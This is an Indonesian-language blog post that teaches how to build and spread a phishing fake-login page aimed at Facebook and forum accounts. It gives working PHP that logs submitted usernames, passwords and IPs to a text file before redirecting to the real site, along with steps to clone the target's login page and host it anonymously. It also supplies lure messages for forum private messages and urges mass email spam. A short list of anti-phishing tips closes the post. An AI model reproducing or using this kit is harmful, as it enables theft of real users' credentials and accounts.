Cara Membuat Script Fake Login/Phising

apa itu fake login ?? pasti dah banyak banget yg tau apa lagi senior² yg tiap hari berkutik dengan komputer n web, bagi yg belum tau silahkan cari tau sendiri [aq sendiri juga baru belajar koq :P], kali ini saya cuma pengen jelasin cara membuatnya...
langkah pertama silahkan buat 3 file;

- index.html
- next.php
- ppp.text

setelah itu, pada file next.php masukkan code ini

$datum = date('d-m-Y / H:i:s'); <br />$ip = $_SERVER['REMOTE_ADDR']; <br />header("Location: http://target.com"); <br />$handle = fopen("ppp.txt", "a"); <br />foreach($_GET as $variable => $value) { <br />fwrite($handle, $variable); <br />fwrite($handle, "="); <br />fwrite($handle, $value); <br />fwrite($handle, "\r\n"); <br />} <br />fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n"); <br />fwrite($handle, "\r\n"); <br />fclose($handle); <br /><br />setcookie ("user", "empty", time()+3600); <br />exit; <br />?>

"ganti code http://target.com pada header location diatas dengan alamat forum"

nah.. stelah persiapan tadi selesai dibuat. sekrang silahkan anda menuju target forum yg akan anda buat pishernya di browser anda...

setelah anda berada di forum login tersebut buka source code untuk melihat script html page tersebut...[klik kanan>>view source code/ctrl+U]...

kemudian copy paste seluruh source codenya ke file index.html yg telah anda siapkan...
edit index.html anda trus cari code method="POST" ganti dengan method="get"
satu lagi cari action="https://login.facebook.com/login.php?login_attempt=1" kemudian ganti teks login.php login.php dengan action="next.php"

dengan begitu password log akan dissafe di file ppp.txt

terakhir tinggal upload ke-3 file tersebut ke freehosting [silahkan cari layanan freehosting sesuka anda, banyak layanan yg menyediakannya... nanti malah aq yg dibilang promosi k'lo q sebutin satu²....]

setelah anda upload file tersebut sebaiknya check dulu, sebab kemungkinan akan ada beberapa error!! nah jika itu terjadi umpankan terlebih dahulu target kita ke link contoh http://dickdownload.com/ copy url tersebut.. pada index.html kita cari
search href=
ganti dengan alamat forumnya...

contoh;
yg kita dapatkan ./styles/hestia_blue/theme/mac.css
nah setelah kita ubah jadinya http://dickdownload.com/styles/hestia_b ... me/mac.css

lakukan hal tersebut pada semu hreff link.. untuk menyamakan style [gambar] cari src dan lakukan seperti cara tadi

cat:
- gunakan pishing forum pada private massage (pm)
- usahakan alamat/ link pishing anda terlihat panjang
- gunakan bbcodenya, karna target kita adalah forum..
contoh: [url=phising link anda]contoh link yang ditujuh[/url]
- gunakan creatifitas anda untuk menentukan topic pm tersebut
- jangan gunakan pishing dengan pm all member
- cat. penting untuk menghindari kemungkinan terburuk saat anda registrasi di free hosting gunakan proxy

ini contoh kirmannya;

"Hey is this yours post?" atau "Did you uploaded this?" trus masukin deh
[url=phising link anda]contoh link yang ditujuh[/url]

gimana??? masih pada bingung dengan cara buat script sendiri??? dan masih penasaran mau nyontek facebook orang lain???

gini deh, dari pada bingung silahkan copy code sesuai dengan contoh script ini
view code script

copy ke index.html yg kalian siapkan di hosting tempat anda akan membuat fake login.

truss>> buat file logs.php di hostinganmu, copy script ini ke file tersebut

view code script

nah jangan lupa seperti yg saya jelaskan diawal pada hostingan tadi jangan lupa buat file kosong yang formatnya txt dengan nama: logs.txt karna ini tempat simpen email n password target!!

terakhir>> Ini wajib dan harus diingat! change mode semua filenya, sehingga permissionnya menjadi: 777 ( chmod + 777). Chmod 777 artinya dimana semua file dapat dibaca (r), dapat ditulis(w), dan dapat di eksekusi(x). Jadi chmod 777 adalah untuk merubah file agar file tersebut dapat di eksekusi oleh User, Groups & Other. Hasil set file permission 777 adalah (rwxrwxrwx) untuk Unix Server. Untuk masalah permission ini juga tergantung dari penyedia hosting, buat yang pake hosting gak nyediain change mode, langsung ajah dicoba tanpa memperhatikan poin ini & berdoa saja ini bisa berjalan.. Selain 777 explore permission bisa menjadi 775, 755 disesuaikan dengan server dan penyedia hosting anda.

nah sekarang kamu tinggal nyebarin URL yg tadi dibuat ke sesama user facebook/iklan/atau spam lewat email sebanyak2nya..
ini salah satu contoh tampilan uji coba aplikasi websitenya:
http://www.airdata.nl/libraries/tcpdf/config/lang/facebook/index.html


cat.
silahkan digunakan seperlunya, jadilah orang yg bijak!!!

Dan buat para Facebook’ers mania, oh ya, ni skalian gw kasi tips supaya hati hati & biar gak kna Fake Login:

1) Perhatikan dengan benar link address websitenya. link fb: http://www.facebook.com

2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.

3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’

4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.

5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. hehehe..

SHARE

About Unknown